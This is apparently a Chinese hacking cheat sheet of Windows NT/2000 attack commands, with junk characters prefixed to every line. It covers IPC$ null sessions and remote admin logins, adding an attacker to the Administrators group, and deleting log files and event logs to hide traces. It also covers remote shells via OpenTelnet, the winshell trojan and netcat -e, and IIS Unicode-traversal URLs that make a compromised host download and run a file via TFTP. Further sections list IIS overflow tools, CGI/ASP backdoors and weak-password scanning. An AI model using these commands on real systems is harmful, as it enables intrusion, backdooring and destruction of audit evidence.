网管和黑客都必须知道的命令
0"D?.E"$r 常用的几条NET命令:
YJtOdgG|q HN&vk/[ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
X|QX1dl w|U@jr*H] (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
TJGKQyG$L tX2>a (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
J~ gkGso |GLn
9vw7S (查看远程主机时间) net time \\IP地址
eB1eUK> HpgN$$\@ (定时启动某个程序) at \\IP地址 02:18 readme.exe
!C)> =<tJAoVV (查看共享) net view \\IP地址
I$P7%} t)kr/Z*p\ (查看netbios工作组列表) nbtstat -A IP地址
JeSkNs|vB 5;KT-(q~ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
;lPhSkD "r `6c0Z (这两条把自己增加到管理员组): net user 用户名 密码 /add
GmWQJY X\ 'kONb net localgroup Administrators 用户名 /add
OKNs (H oz5lt4 (断开连接) net use \\IP地址\ipc$ /delete
!*QA;*e C&MqUj"] 扫尾:
}v|[h[cZ ]r{#268 del C:\winnt\system32\logfiles\*.*
l9Cy30O6 &^Q~G>A del C:\winnt\ssytem32\config\*.evt
I>(z)"1 b*%WAVt2T del C:\winnt\system32\dtclog\*.*
iF2IR{h C@:N5},] del C:\winnt\system32\*.log
*{n,4d\.. fJN9+l del C:\winnt\system32\*.txt
<P)%Ms orN2(:Ct7 del C:\winnt\*.txt
FU3IK3} #cg@Z del C:\winnt\*.log
7!d<>_oH 6b5{ 一、netsvc.exe
^L2Zo'y [ ="PywZ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
Lm2cW$s 3n"&$q6 netsvc /list \\IP地址
j1C0LP8 !7Q.w/|= netsvc schedule \\IP地址 /query
9"v ox JL*]9$o netsvc \\IP地址 schedule /start
(6_/n&mF u=N;P 二、OpenTelnet.exe
xuC6EK+ kys-~&@+ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
53#5p;k
L?5t<`#lw OpenTelnet \\IP地址 用户名 密码 1 7878
rEyMSLN W2V@\ 然后就可以telnet到主机的7878端口,进入DOS方式下:
,DsT:8 y"n~ET}e7 telnet IP地址 7878
$7ME a"a %-zH]"Q$ 三、winshell.exe
ZXRN?b S %%qn 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
Vf2!0 wZolg~dg p Path (查看winshell主程序的路径信息)
-^%"w RB
0j!H: b reBoot (重新启动机器)
= ~R3*GN >?\ !k
c d shutDown (关闭机器)
O4+w2'., Ki6BPi^ s Shell (执行后你就会看到可爱的“C:\>”)
6}ewBAq% mTu9'/$( x eXit (退出本次登录会话,此命令并不终止winshell的运行)
]-]@=qYu Jrrk$0H^~ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
Xrs~ove1V #nL0Hx7]E 四、3389登陆器,GUI方式登录远程主机的
gnK!"!nL IBHG1<3 五、elsave.exe
}C1}T}U 9d|7#)a; 事件日志清除工具
gM:oP. 'r3}= z4Y elsave -s \\IP地址 -l "application" -C
=|^W]2W$ Y\2>y"8>$x elsave -s \\IP地址 -l "system" -C
=<tEc+!T3 MZ[g|o!)v elsave -s \\IP地址 -l "security" -C
/60=N`i
>~r@*gml 执行后成功清除应用程序日志,系统日志,安全日志
!,WRXE&j n_gB#L$ 六、hbulot.exe
t$Ji{t- Z%d4V<fn 开启win2kserver和winxp的3389服务
RB@gSHOc? @k;3$ hbulot [/r]
^Rh ~+ {:+^[rerj 使用/r表示安装完成后自动重起目标使设置生效。
U/lra&P Icb;Yzt 七、nc.exe(netcat.exe)
v2<gkCK^ IWd*"\L 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
^OsUWhkV M0\[hps~X 想要连接到某处: nc [-options] hostname port[s] [ports] ...
S5p\J!k\B e=$xn3)McY 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
*)sz]g|d eesLTyD2_ 参数:
(8/xSOZ[ |W[rywxx -e prog 程序重定向,一旦连接,就执行 [危险!!]
LxGh *7K- B(NL3WJ -g gateway source-routing hop point[s], up to 8
tG&B D\ a,\u|T:g -G num source-routing pointer: 4, 8, 12, ...
6<O]_ HZ& %-1-J<<J
q -h 帮助信息
$VNn`0^gF ZSf+5{2m -i secs 延时的间隔
*38\&"s4_ 8hV:bz" -l 监听模式,用于入站连接
k !r z8S" W u{nC -n 指定数字的IP地址,不能用hostname
LB0=V0| 2)]*re) -o file 记录16进制的传输
[^P2Kn {[# -p port 本地端口号
!7|9r$ "6h.6_bTw -r 任意指定本地及远程端口
#J9XcD{1 RGOwm~a -s addr 本地源地址
x/v+7Pt_ 2?&ptN)`N -u UDP模式
KL{uhb0f \}c50}#0 -v 详细输出——用两个-v可得到更详细的内容
lsf?R'1 nQMN2j M -w secs timeout的时间
-I<`!kH* g*9>z) -z 将输入输出关掉——用于扫描时
AX?6Q4Gq1 八、TFTPD32.EXE
C*zdHzMj s_Gp +- 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
cViCWc2 ;pYk+r6 Cr http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
qN(;l&Q pm|]GkM 然后可以直接令文件运行:
3j#F'M)s{ SJe;T http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
1EB`6_>y s^<
oU 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
P]^]
T}5 J]e&z5c 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
HX^
P9jXT =25"qJr 一、一 Xscan命令行运行参数说明:
)Qp?LECrt "[,XS` 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
rZ7 Ihof %&NK|M+n 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
^hJ,1{o efm<bJB2 xscan -file <主机列表文件名> <检测项目> [其他选项]
7 |A,GH s"Wdbw(O ' 其中<检测项目> 含义如下:
jiDYPYx;I \U8Vsx1tl -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
sIe(;%[` '-qc\6UY -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
':@qE\( L x&ZWF$ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
XFYl[?`G X8TZePh -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[0emOS 75ob1h" -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
1:8: yFV otx7J\4 [其他选项] 含义如下:
X88ZdM' )kUw,F=6 -v: 显示详细扫描进度
FB`HwE< Ek6W:Q:@ -p: 跳过Ping不通的主机
8B5%IgA J!>oC_0]8 -o: 跳过没有检测到开放端口的主机
Uyh#g^r VdgPb ( -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10